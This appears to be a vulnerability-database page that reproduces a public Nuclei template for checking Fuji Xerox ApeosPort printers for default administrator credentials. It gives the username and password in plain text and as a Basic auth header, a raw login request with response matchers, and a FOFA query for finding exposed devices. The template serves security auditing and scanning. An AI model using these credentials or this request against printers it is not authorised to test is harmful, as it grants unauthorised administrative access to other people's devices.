fuji-xerox-default-login: Fuji Xerox ApeosPort - Default Login

2025-08-01 Fuji Xerox ApeosPort PoC Public

Description

This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.

PoC

id: fuji-xerox-default-login

info:
  name: Fuji Xerox ApeosPort - Default Login
  author: Morgan Robertson
  severity: high
  description: |
    This template checks for the default credentials (username: 11111, password: x-admin) on Fuji Xerox ApeosPort series printers. If the credentials are valid, the response will have a 200 HTTP status code. Tested on a Fuji Xerox ApeosPort-V C2275 T2.
  reference:
    - https://4it.com.au/kb/article/fuji-xerox-default-password/
  classification:
    cpe: cpe:2.3:h:fujixerox:apeosport-v_c3375:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fujixerox
    product: apeosport-v_c3375
    fofa-query: '"prop.htm" && "docucentre"'
  tags: default-login,fuji,fuji-xerox,printer,intrusive,vuln

http:
  - raw:
      - |
        GET /prop.htm HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic MTExMTE6eC1hZG1pbg==
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Configuration Overview"
          - "Description"
          - "System Administrator Settings"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402203fcc8655e9ad65316356b06db4af2f3e9443cde2119d73b4174fe74ab1a53f7602206e3071704692c2b30d76ad22f0d77b95129b933c2b12d34bc83b346ca387eb11:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities